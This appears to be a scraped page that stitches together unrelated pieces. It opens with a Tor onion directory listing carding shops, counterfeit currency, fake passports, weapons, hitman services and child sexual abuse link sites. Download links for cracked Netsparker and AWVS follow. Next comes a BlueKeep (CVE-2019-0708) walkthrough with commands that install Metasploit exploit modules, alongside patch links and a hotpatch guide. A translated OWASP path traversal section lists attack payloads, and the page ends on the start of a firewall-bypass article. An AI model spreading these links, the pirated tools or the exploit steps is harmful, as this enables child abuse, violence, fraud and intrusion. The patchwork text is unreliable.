http://torbrokerge7zxgq.onion/ – TorBroker – Trade securities anonymously with bitcoin, currently supports nearly 1000 stocks and ETFs
http://fogcore5n3ov3tui.onion/ – Bitcoin Fog – Bitcoin Laundry
http://2vx63nyktk4kxbxb.onion/ – AUTOMATED PAYPAL AND CREDIT CARD STORE
http://samsgdtwz6hvjyu4.onion – Safe, Anonymous, Fast, Easy escrow service.
http://easycoinsayj7p5l.onion/ – EasyCoin – Bitcoin Wallet with free Bitcoin Mixer
http://jzn5w5pac26sqef4.onion/ – WeBuyBitcoins – Sell your Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and more
http://ow24et3tetp6tvmk.onion/ – OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundry
http://qc7ilonwpv77qibm.onion/ – Western Union Exploit
http://3dbr5t4pygahedms.onion/ – ccPal Store
http://y3fpieiezy2sin4a.onion/ – HQER – High Quality Euro Replicas
http://qkj4drtgvpm7eecl.onion/ – Counterfeit USD
http://nr6juudpp4as4gjg.onion/pptobtc.html – PayPal to BitCoins
http://nr6juudpp4as4gjg.onion/doublecoins.html – Double Your BitCoins
http://lw4ipk5choakk5ze.onion/raw/4588/ – High Quality Tutorials

Marketplace Commercial Services

http://6w6vcynl6dumn67c.onion/ – Tor Market Board – Anonymous Marketplace Forums
http://wvk32thojln4gpp4.onion/ – Project Evil
http://5mvm7cg6bgklfjtp.onion/ – Discounted electronics goods
http://lw4ipk5choakk5ze.onion/raw/evbLewgkDSVkifzv8zAo/ – Unfriendlysolution – Legit hitman service
http://nr6juudpp4as4gjg.onion/torgirls.html – Tor Girls
http://tuu66yxvrnn3of7l.onion/ – UK Guns and Ammo
http://nr6juudpp4as4gjg.onion/torguns.htm – Used Tor Guns
http://ucx7bkbi2dtia36r.onion/ – Amazon Business
http://nr6juudpp4as4gjg.onion/tor.html – Tor Technology
http://hbetshipq5yhhrsd.onion/ – Hidden BetCoin
http://cstoreav7i44h2lr.onion/ – CStore Carded Store
http://tfwdi3izigxllure.onion/ – Apples 4 Bitcoin
http://e2qizoerj4d6ldif.onion/ – Carded Store
http://jvrnuue4bvbftiby.onion/ – Data-Bay
http://bgkitnugq5ef2cpi.onion/ – Hackintosh
http://vlp4uw5ui22ljlg7.onion/ – EuroArms
http://b4vqxw2j36wf2bqa.onion/ – Advantage Products
http://ybp4oezfhk24hxmb.onion/ – Hitman Network
http://mts7hqqqeogujc5e.onion/ – Marianic Technology Services
http://mobil7rab6nuf7vx.onion/ – Mobile Store
http://54flq67kqr5wvjqf.onion/ – MSR Shop
http://yth5q7zdmqlycbcz.onion/ – Old Man Fixer’s Fixing Services
http://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130827231336IPA_pc.png – PC Shop
http://storegsq3o5mfxiz.onion/ – Samsung StorE
http://sheep5u64fi457aw.onion/ – Sheep Marketplace
http://nr6juudpp4as4gjg.onion/betcoin.htm – Tor BetCoin
http://qizriixqwmeq4p5b.onion/ – Tor Web Developer
http://vfqnd6mieccqyiit.onion/ – UK Passports
http://en35tuzqmn4lofbk.onion/ – US Fake ID Store
http://xfnwyig7olypdq5r.onion/ – USA Citizenship
http://uybu3melulmoljnd.onion/ – iLike Help Guy
http://dbmv53j45pcv534x.onion/ – Network Consulting and Software Development
http://lw4ipk5choakk5ze.onion/raw/4585/ – Quick Solution (Hitman)
http://nr6juudpp4as4gjg.onion/tynermsr.htm – Tyner MSR Store

Marketplace Drugs

http://rso4hutlefirefqp.onion/ – EuCanna – Medical Grade Cannabis Buds, Rick Simpson Oil, Ointments and Creams
http://newpdsuslmzqazvr.onion/ – Peoples Drug Store – The Darkweb’s Best Online Drug Supplier!
http://smoker32pk4qt3mx.onion/ – Smokeables – Finest Organic Cannabis shipped from the USA
http://fzqnrlcvhkgbdwx5.onion/ – CannabisUK – UK Wholesale Cannabis Supplier
http://kbvbh4kdddiha2ht.onion/ – DeDope – German Weed and Hash shop. (Bitcoin)
http://s5q54hfww56ov2xc.onion/ – BitPharma – EU vendor for cocaine, speed, mdma, psychedelics and subscriptions
http://ll6lardicrvrljvq.onion/ – Brainmagic – Best psychedelics on the darknet
http://25ffhnaechrbzwf3.onion/ – NLGrowers – Coffee Shop grade Cannabis from the netherlands
http://fec33nz6mhzd54zj.onion/index.php – Black Market Reloaded Forums
http://atlmlxbk2mbupwgr.onion/ – Atlantis Marketplace Forums
http://atlantisrky4es5q.onion/ – Atlantis Marketplace
http://dkn255hz262ypmii.onion/ – Silk Road Forums
http://4yjes6zfucnh7vcj.onion/ – Drug Market
http://k4btcoezc5tlxyaf.onion/ – Kamagra for BitCoins
http://silkroadvb5piz3r.onion/silkroad/home – Silk Road Marketplace
http://5onwnspjvuk7cwvk.onion/ – Black Market Reloaded

Hosting

http://matrixtxri745dfw.onion/ – Image Uploader
http://lw4ipk5choakk5ze.onion/ – PasteThis – Tor based Pastebin
http://wzrtr6gpencksu3d.onion:8080/ – Gittor
http://nr6juudpp4as4gjg.onion/ – Free hosting
http://tklxxs3rdzdjppnl.onion/ – Liberty’s Hackers Hosting Service
http://matrixtxri745dfw.onion/ – Matrix Trilogy

Blogs

http://74ypjqjwf6oejmax.onion/ – Beneath VT – Exploring Virginia Tech’s Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ – Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page – Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ – Hushbox
http://ad52wtwp2goynr3a.onion/# – Dark Like My Soul
http://tns7i5gucaaussz4.onion/ – FreeFor
http://gdkez5whqhpthb4d.onion/ – Scientology Archive
http://newsiiwanaduqpre.onion/ – All the latest news for tor
http://5vppavyzjkfs45r4.onion/ – Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ – AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ – Blog about Stories
http://tigas3l7uusztiqu.onion/ – Mike Tigas
http://mpf3i4k43xc2usxj.onion/ – Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ – An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ – Totse 2
http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home
http://nwycvryrozllb42g.onion/searchlores/index.htm – Fravia’s Web Searching Lore
http://newsiiwanaduqpre.onion/ – OnionNews – Blog about the onionland

Forums and Chans

http://2gxxzwnj52jutais.onion/phpbb/index.php – Onion Forum 2.0 renewed
http://3fyb44wdhnd2ghhl.onion/ib/ – Onii-Chan
http://bx7zrcsebkma7ids.onion – Jisko
http://npdaaf3s3f2xrmlo.onion/ – Twitter clone
http://jv7aqstbyhd5hqki.onion – HackBB – Hacking & cracking forum
http://xdagknwjc7aaytzh.onion/20/http/1.4.7.9/forummain.htm – Read only access to the Freenet FMS forums via the Anonet Webproxy
http://sbforumaz7v3v6my.onion/ – SciBay Forums
http://kpmp444tubeirwan.onion/ – DeepWeb
http://r5c2ch4h5rogigqi.onion/ – StaTorsNet
http://hbjw7wjeoltskhol.onion – The BEST tor social network! File sharing, messaging and much more. Use a fake email to register.
http://t4is3dhdc2jd4yhw.onion/ – OnionForum 3.0 – New Onionforum for general talk, now with marketplace
http://zw3crggtadila2sg.onion/imageboard/ – TorChan – One of the oldest chans on Tor

Email and Messaging

http://bitmailendavkbec.onion – swiss email
http://365u4txyqfy72nul.onion/ – Anonymous E-mail sevice. You can only communicate with other users currently using this service. So tell all your friends about it!
http://sms4tor3vcr2geip.onion/ – SMS4TOR – Self destructing messages
http://notestjxctkwbk6z.onion/ – NoteBin – Create encrypted self-destructing notes
http://torbox3uiot6wchz.onion/ – [TorBox] The Tor Mail Box
http://u6lyst27lmelm6oy.onion/index.php – Blue matrix chat NOT UP ALL THE TIME so chek often to see when it is
http://wi7qkxyrdpu5cmvr.onion/ – Autistici/Inventati
http://u4uoz3aphqbdc754.onion/ – Hell Online

Political

http://6sgjmi53igmg7fm7.onion/index.php?title=Main_Page – Bugged Planet
http://faerieuaahqvzgby.onion/ – Fairie Underground
http://2r2tz6wzqh7gaji7.onion/ – Kavkaz Center
http://tnysbtbxsf356hiy.onion/ – The New Yorker Strongbox
http://duskgytldkxiuqc6.onion/ – Example rendezvous points page
http://rrcc5uuudhh4oz3c.onion/ – The Intel Exchange Forum :: Information and discussion on various topics, ranging from Illegal Activities and Alternative Energy, to Conspiracy Theories and Hacking. Same people from SnapBBS on a fully secure, moderated and categorized forum.
http://opnju4nyz7wbypme.onion/weblog/index.html – A7B blog :: a blog dedicated to the restoration of a limited constitutional republic in the USA
http://assmkedzgorodn7o.onion/ – Anonymous, safe, secure, crowdfunded assassinations.
http://duskgytldkxiuqc6.onion/comsense.html – Commo Sense by Thomas Paine
http://nwycvryrozllb42g.onion/ – Destination Unknown
http://zbnnr7qzaxlk5tms.onion/ – Wiki Leaks

Hacking

http://salted7fpnlaguiq.onion/ – SALT
http://yj5rbziqttulgidy.onion/ – Itanimulli
http://bbxdfsru7lmmbj32.onion/marketplace/ – Delta Initiative
http://2ogmrlfzdthnwkez.onion/ – Rent-A-Hacker

Warez

http://2gxxzwnj52jutais.onion/ – The Nowhere Server (restored from backup after FH)
http://jntlesnev5o7zysa.onion/ – The Pirate Bay – Torrents
http://am4wuhz3zifexz5u.onion/ – Tor Library – library of books and other media files
http://uj3wazyk5u4hnvtk.onion/ – The Pirate Bay – Torrents (official .onion)
http://doxbindtelxceher.onion/ – DOXBIN
http://wuvdsbmbwyjzsgei.onion/ – Music Downloads
http://lolicore75rq3tm5.onion/ – Lolicore and Speedcore Music
http://xfmro77i3lixucja.onion/ – ebooks
http://vt27twhtksyvjrky.onion/ – lol 20th Century Western Music Recordings and Scores
http://2ygbaoezjdmacnro.onion/ – Pony at Noisebridge
http://xfmro77i3lixucja.onion/ – Imperial Library of Trantor
http://c3jemx2ube5v5zpg.onion/ – Jotunbane’s Reading Club

Drugs Non-commercial

No links found.

Erotic 18+

http://tklxxs3rdzdjppnl.onion/sharepass/ – SharePass – Password sharing community
http://k4jmdeccpnsfe43c.onion/ – Girls Released – Some nice model pics
http://54dgeda4ik6iypui.onion/ – Gallery – Met-Art, FTVX etc sets
http://pinkmethuylnenlz.onion/ – The Pink Meth (mirror)
http://2fqgjzbb2h7yevom.onion/klixen/ – Klixen
http://orsxvca7glswueo7.onion/ – EroDir – Lots and lots of Hentai
http://mmgh3rqeswrlgzdr.onion/ – VOR-COM

Erotic Hard Candy

http://lovezspamopfiqul.onion/ – TLZ discussion board
http://tqjhyhbso4mdcrvh.onion/sciclaycams/ – Sciclay Cams
http://iqlnc7cbykhhurfo.onion/ – LLL – Image and Video down- & upload
http://oglbv4c4kpoobkid.onion/oglb/ – Onion Girl Love Board – Private Board
http://bvunqhdbizqxyuoe.onion/ – Boy Vids 4.0
http://girlbmayme6evpwv.onion/ – Girls and Boys
http://op4jvhn65pjv3slt.onion/ – PedoEmpire
http://7haz75ietrhjds3j.onion/ – All Natural Spanking
http://spofoh4ucwlc7zr6.onion/ – Safe Port Forum
http://tqjhyhbso4mdcrvh.onion/forum/ – BL Forum
http://ftwwebt6e3nb3lmw.onion/ – FTW Image Boards
http://tlz3gig7k46s4r66.onion/ – TLZ private forums
http://vkq6wz4ozmldscii.onion/ – Topic Links – A CP sites link list

Erotic Jailbait

http://66m4z7ygkqghb4tc.onion/ – Some paradisebirds casey videos

Non-English

http://germanyhusicaysx.onion – Deutschland im Deep Web – German forum
http://ffi5v46ttwgx3fby.onion/ – Das ist Deutschland hier 2.0 – German Board
http://paisleli66axejos.onion/ – PAIS
http://hyjmkmb3lfymiprp.onion/hen/papieze/ – Dziecięca pedofilia
http://runionv62ul3roit.onion/ – Russian Onion Union
http://s6cco2jylmxqcdeh.onion/ – ?ltimos bumps
http://5xki35vc4g5ts6gc.onion – GTF Greek Tor Forum . For greek speaking users
http://cipollatnumrrahd.onion/index.php – Cipolla 2.0 – Italian Community
http://runionv62ul3roit.onion – Russian community: market and anonymous talks about security, guns etc.
http://ptrackcp2noqu5fh.onion/ – PoliceTrack – Ne vous faites plus suivre par la police.
http://amberoadychffmyw.onion – Amberoad – russian anonymous market
http://r2d2akbw3jpt4zbf.onion – R2D2 – russian anonymous market
http://ramp2bombkadwvgz.onion – RAMP – biggest russian market (drugs only)
http://szmyt4v4vjbnxpg3.onion/ – Славянский
http://o2tu5zjxjlibrary.onion/ – Bibliotheca Alexandrina
http://xzzpowtjlobho6kd.onion/wordpress/ – DeepBlog
http://zqiirytam276uogb.onion/ – Thorlauta
http://ocbh4hoqs37unvv6.onion – French Deep Web

Netsparker破解版5.3 Netsparker Enterprise 5.3.0.24388[cracked]

Image may be NSFW.
Clik here to view.
Netsparker破解版5.3

Netsparker破解版5.3 Netsparker Enterprise 5.3.0.24388[cracked]
该版本更新时间为2019年7月8日
下载地址:
1 https://www.dr-farfar.com/netsparker-professional-full/ (自行扶墙)
2 链接: https://pan.baidu.com/s/1wOd8mEXLxeJP32nFsO1l0A 提取码: 1ff5

Image may be NSFW.
Clik here to view.
Netsparker破解版5.3

更新日志:参考netsparker官网
修复了一个错误,在DOM模拟期间,在导航操作时可能无法正确地对HTTPS端点进行爬网。
修复了一个手动爬行模式的错误,在该模式下,初始爬行阶段结束后可能停止执行。
修正了一些反应网站中表单认证可能无法执行的问题
修复了进程可能因NullReferenceException而崩溃的问题

Image may be NSFW.
Clik here to view.

关于netsparker自行参考本网站其他地方的描述(功能)
https://www.ddosi.com/?s=netsparker

from 更新地址 https://www.dr-farfar.com/netsparker-professional-full/

CVE-2019-0708漏洞复现及修复补丁

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。

2019年9月7日晚上凌晨1点左右,metaspolit更新了漏洞利用程序

Kali里面执行如下命令 (记得先更新metasploit 再执行如下命令—–不然你可能会报错出现找不到这个目录/usr/share/metasploit-framework/modules/exploits/windows/rdp/ 的问题)

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

测试成功版本Windows 2008r2withsp1 english standard,vmare版本:15.1.0 build-13591040。

2008r2withsp1 english standard需要修改注册表

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam] 值修改为0
Image may be NSFW.
Clik here to view.
CVE-2019-0708漏洞复现及修复补丁

其中RDP_CLIENT_IP为已经连接上要攻击的服务器的客户端ip地址,RHOSTS为被攻击的Ip地址。我这里用的是win10(192.168.1.8)连接到08r2(2192.168.1.10)的远程桌面,kali(192.168.1.6)

CVE-2019-0708漏洞修复补丁以及安全建议

有些windows2008系统打不了补丁的一般是数据中心版本,可以设置一下服务器,计算机右键属性-远程设置-仅允许运行使用网络基本身份验证的远程桌面的计算机连接(更安全)(N),在这行点勾,然后确认即可,可以临时的防止漏洞的攻击。

如果对补丁不知道该如何修复的,可以启用阿里云的端口安全策略,禁止掉3389远程端口,只允许自己的IP通信即可。

Windows Server 2008 漏洞补丁系列下载地址

Windows Server 2008 32位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu

Windows Server 2008 x64位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu

Windows Server 2008 R2 Itanium系统:

http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu

Windows Server 2008 R2 x64系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

Windows Server 2008 Itanium:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu

Windows Server 2003 漏洞补丁系列下载地址

Windows Server 2003 32位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe

Windows Server 2003 64位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

Windows XP 漏洞补丁系列下载地址

Windows XP SP3 32位系统:

http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe

Windows XP SP2 64位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

Windows XP SP3 for XPe:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe

from

修复方式二 CVE-2019-0708漏洞热补丁工具使用手册– 奇安信

奇安信CVE-2019-0708漏洞热补丁工具

使用手册

“奇安信CVE-2019-0708漏洞热补丁工具”是奇安信公司针对“Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708”推出的一款热补丁工具。该工具能够针对系统环境无法打软件官网补丁或暂时无法重启的系统环境进行热补丁加固。

  • 使用说明

下载页面:

https://www.qianxin.com/other/CVE-2019-0708

使用说明:

1、  下载文件进行解压。

2、  使用win+R快捷键或开始菜单选择“运行”,输入cmd。调起命令行工具。

3、  在命令行工具,执行命令到工具所在文件夹

4、  输入命令对应功能,启用热补丁命令:QKShield.exe  /enable ;禁用热补丁命令:QKShield.exe/disable 。

5、  重启系统后,需要重新运行命令行来启用热补丁

  • 实现效果:

在工具支持的系统中启用热补丁后,用漏洞扫描工具扫描结果为没有漏洞。
漏洞扫描工具下载地址:https://www.qianxin.com/other/CVE-2019-0708

  • 支持系统:

Windows XP for 32-bit Systems Service Pack 3

Windows 7 for 32-bit Systems

Windows 7 for x64-based Systems

Windows 7 for 32-bit Systems Service Pack 1

Windows 7 for x64-based Systems Service Pack 1

Windows Server 2003 for 32-bit Systems Service Pack 2

Windows Server 2003 R2 for 32-bit Systems Service Pack2

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack2

Windows Server 2008 for x64-based Systems Service Pack2 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems ServicePack 1

Windows Server 2008 R2 for x64-based Systems ServicePack 1 (Server Core installation)

暂不支持的系统:

Windows Server 2003 for x64-based Systems Service Pack2

Windows Server 2008 for Itanium-Based Systems ServicePack 2

Windows Server 2008 R2 for Itanium-Based SystemsService Pack 1

from

awvs12破解版下载-12.0.190530102 cracked

没写,懒得写。
具体自己参考往期描述
https://www.ddosi.com/?s=awvs

awvs12破解版下载地址:https://pan.baidu.com/s/1iEOCXhTuK-FvY03b4rFkiQ
提取码: b5tu
解压密码 www.ddosi.com

安装方法:
1 运行acunetix_12.0.190530102.exe文件,正常安装AWVS12。
2 将patch.exe和patch.dat复制到AWVS安装目录
(默认安装目录为C:\Program Files (x86)\Acunetix\12.0.190530102)
3 以管理员身份运行patch.exe文件,根据提示填写相关信息(乱填一气),完成破解。
(在windows 10中可以直接双击运行,另外patch.exe和patch.dat必须要在一起。

Image may be NSFW.
Clik here to view.
awvs12破解版下载-12.0.190530102 cracked
Image may be NSFW.
Clik here to view.
awvs12破解版下载-12.0.190530102 cracked

from

owasp渗透测试指南 OWASP Testing Guide v5

owasp渗透测试指南文档地址:
https://github.com/OWASP/OWASP-Testing-Guide-v5

例如:目录遍历和文件包含漏洞的测试
随机翻译一篇,地址:
github.com/OWASP/../4.6.1_Testing_Directory_Traversal_File_Include_OTG-AUTHZ-001

总结

许多web应用程序在日常操作中使用和管理文件。攻击者可以使用未经良好设计或部署的输入验证方法,利用系统来读取或写入不可访问的文件。在特定情况下,可以执行任意代码或系统命令。

传统上,web服务器和web应用程序实现身份验证机制来控制对文件和资源的访问。web服务器试图将用户的文件限制在“根目录”或“web文档根目录”中,后者表示文件系统上的物理目录。用户必须将此目录视为web应用程序层次结构中的基本目录。

使用访问控制列表(acl)定义权限,acl标识哪些用户或组应该能够访问、修改或执行服务器上的特定文件。这些机制旨在防止恶意用户访问敏感文件(例如,类unix平台上的common/etc/passwd文件)或避免执行系统命令。

许多web应用程序使用服务器端脚本来包含不同类型的文件。使用这种方法来管理图像、模板、加载静态文本等非常常见。不幸的是,如果未正确验证输入参数(即表单参数、cookie值),这些应用程序将暴露安全漏洞。

在web服务器和web应用程序中,在路径遍历/文件包含攻击中会出现这种问题。通过利用此类漏洞,攻击者能够读取通常无法读取的目录或文件,访问Web文档根目录之外的数据,或包含外部网站中的脚本和其他类型的文件。

在《owasp测试指南》中,只考虑与web应用程序相关的安全威胁,而不考虑对web服务器的威胁(例如,在microsoft iis web服务器中臭名昭著的“5c转义代码”)。更多阅读建议将在参考资料部分提供给感兴趣的读者。

这种攻击也称为点斜杠攻击(../)、目录遍历、目录爬升或回溯。

在评估期间,为了发现路径遍历和文件包含的缺陷,测试人员需要执行两个不同的阶段:

(a)输入向量计数(对每个输入向量的系统评估)

(b)测试技术(对攻击者利用漏洞使用的每种攻击技术进行系统评估)

How to Test(如何测试)

Black Box Testing(黑盒测试)

Input Vectors Enumeration(输入向量枚举)

为了确定应用程序的哪个部分易受输入验证绕过的攻击,测试人员需要枚举应用程序中接受用户内容的所有部分。这还包括http get和post查询以及常见的选项,如文件上传和html表单。

以下是本阶段要执行的检查示例:

是否有可用于文件相关操作的请求参数?
有什么不寻常的文件扩展名吗?
有有趣的变量名吗?

http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm

是否可以识别web应用程序用于动态生成页面或模板的cookie?

Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed

Testing Techniques(测试技巧)

下一个测试阶段是分析web应用程序中的输入验证功能。使用前面的示例,名为getuserprofile.jsp的动态页面从文件加载静态信息并向用户显示内容。攻击者可以插入恶意字符串“../../../../etc/passwd”以包含Linux/Unix系统的密码哈希文件。显然,这种攻击只有在验证检查点失败时才可能发生;根据文件系统权限,web应用程序本身必须能够读取文件。

要成功测试此缺陷,测试人员需要了解正在测试的系统和所请求文件的位置。从iis web服务器请求/etc/passwd是没有意义的。

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

cookies遍历举例:

Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd

也可以包括外部网站上的文件和脚本。

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

如果接受协议作为参数,如上面的例子所示,也可以这样探测本地文件系统。

http://example.com/index.php?file=file:///etc/passwd

如果接受协议作为参数,就像上面的例子一样,也可以探测本地服务和附近的服务。

http://example.com/index.php?file=http://localhost:8080 
或者
http://example.com/index.php?file=http://192.168.0.2:9080

下面的示例将演示如何在不使用任何路径遍历字符的情况下显示cgi组件的源代码。

http://example.com/main.cgi?home=main.cgi

名为“main.cgi”的组件与应用程序使用的普通HTML静态文件位于同一目录中。在某些情况下,测试人员需要使用特殊字符(如“.”,“%00” “null”,…)对请求进行编码,以便绕过文件扩展控制或防止脚本执行。

提示:对于开发人员来说,不期望每种形式的编码,因此只对基本编码内容进行验证是一个常见的错误。如果开始测试字符串不成功,请尝试其他编码方案。

每个操作系统使用不同的字符作为路径分隔符:

Unix-like OS:

  • root directory: “/
  • directory separator: “/

Windows OS’ Shell’:

  • root directory: “<drive letter>:\
  • directory separator: “” or “/”

Classic Mac OS:

  • root directory: “<drive letter>:
  • directory separator: “:

我们应该考虑以下字符编码机制:

  • URL encoding and double URL encoding
    • %2e%2e%2f represents ../
    • %2e%2e/ represents ../
    • ..%2f represents ../
    • %2e%2e%5c represents ..\
    • %2e%2e\ represents ..\
    • ..%5c represents ..\
    • %252e%252e%255c represents ..\
    • ..%255c represents ..\ and so on.
  • Unicode/UTF-8 Encoding (it only works in systems that are able to accept overlong UTF-8 sequences)
    • ..%c0%af represents ../
    • ..%c1%9c represents ..\

还有其他操作系统和应用程序框架的特殊考虑。例如,windows对文件路径的解析非常灵活。

  • Windows shell: Appending any of the following to paths used in a shell command results in no difference in function:
    • Angle brackets “>” and “<” at the end of the path
    • Double quotes (closed properly) at the end of the path
    • Extraneous current directory markers such as “./” or “.\”
    • Extraneous parent directory markers with arbitrary items that may or may not exist Examples:
file.txt
file.txt...
file.txt<spaces>
file.txt””””
file.txt<<<>>><
./././file.txt
nonexistant/../file.txt
  • Windows API: The following items are discarded when used in any shell command or API call where a string is taken as a filename:
    • periods
    • spaces
  • Windows UNC Filepaths: Used to reference files on SMB shares. Sometimes, an application can be made to refer to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which can be captured and cracked. These may also be used with a self-referential IP address or domain name to evade filters, or used to access files on SMB shares inaccessible to the attacker, but accessible from the web server.
\\server_or_ip\path\to\file.abc
\\?\server_or_ip\path\to\file.abc
  • Windows NT Device Namespace: Used to refer to the Windows device namespace. Certain references will allow access to file systems using a different path.
    • May be equivalent to a drive letter such as c:\, or even a drive volume without an assigned letter.\\.\GLOBALROOT\Device\HarddiskVolume1\
    • Refers to the first disc drive on the machine. \\.\CdRom0\

Gray Box Testing(灰盒测试)

当使用灰盒方法进行分析时,测试人员必须遵循与黑盒测试相同的方法。但是,由于他们可以检查源代码,因此可以更容易和准确地搜索输入向量(测试阶段(a))。在源代码检查期间,他们可以使用简单的工具(例如grep命令)在应用程序代码中搜索一个或多个常见模式:包含函数/方法、文件系统操作等。

PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ... JSP/Servlet: java.io.File(), java.io.FileReader(), ... ASP: include file, include virtual, ...

使用在线代码搜索引擎(例如,search code),也可以在互联网上发布的开源软件中发现路径遍历缺陷。

对于php程序测试如下:

lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)

使用灰盒测试方法,可以发现在标准黑盒评估期间通常较难发现,甚至不可能发现的漏洞。

一些web应用程序使用存储在数据库中的值和参数生成动态页面。当应用程序向数据库添加数据时,可能会插入巧尽心思构建的路径遍历字符串。由于包含函数中的参数看起来是内部的,是“安全的”,但实际上并不是这样,这类安全问题很难被发现。

此外,通过查看源代码,可以分析处理无效输入的函数:一些开发人员试图更改无效输入以使其有效,从而避免警告和错误。这些功能通常容易出现安全缺陷。

考虑使用以下说明的web应用程序:

    filename = Request.QueryString(“file”);
    Replace(filename, “/”,”\”);
    Replace(filename, “..\”,””);

通过以下方法对缺陷进行测试:

    file=....//....//boot.ini
    file=....\\....\\boot.ini
    file= ..\..\boot.ini

用到的工具:

雨苁:本次仅仅对owasp目录遍历章节的渗透测试指南进行简单翻译,owasp渗透测试指南还有很多章节,自取,自译,share and fire !
owasp渗透测试指南文档地址:
https://github.com/OWASP/OWASP-Testing-Guide-v5

利用IIS的端口共享功能绕过防火墙

0x00 前言

Windows服务器开启了IIS服务,防火墙仅允许80或443端口进行通信,那么如何在不使用webshell的前提下,实现对该服务器的远程管理?更进一步,如果只有低权限,有没有办法呢?

0x01 简介

本文将要介绍以下内容:

  • HTTP.sys和端口共享
  • WinRM服务
  • HTTP Server API
  • 针对80和443端口的利用方法
  • 针对高权限和低权限的利用方法
  • 检测方法

0x02 基本概念

1.HTTP.sys和端口共享

微软在Windows 2003 Server加入了内核驱动程序(Http.sys),用于侦听http流量并根据URL进行处理,允许任意用户进程共享专用于HTTP流量的TCP端口

也就是说,通过HTTP.sys,多个进程将能够侦听同一端口上的HTTP流量

可以使用Netsh命令来查询和配置HTTP.sys设置和参数,参考资料如下:

https://docs.microsoft.com/en-us/windows/win32/http/netsh-commands-for-http

列出所有URL的DACL,命令如下:

netsh http show urlacl

系统默认包括10个DACL,其中的两个对应WinRM服务,具体信息如下:

    Reserved URL            : http://+:5985/wsman/
        User: NT SERVICE\WinRM
            Listen: Yes
            Delegate: No
        User: NT SERVICE\Wecsvc
            Listen: Yes
            Delegate: No
            SDDL: D:(A;;GX;;;S-1-5-80-569256582-2953403351-2909559716-1301513147
-412116970)(A;;GX;;;S-1-5-80-4059739203-877974739-1245631912-527174227-299656351
7)

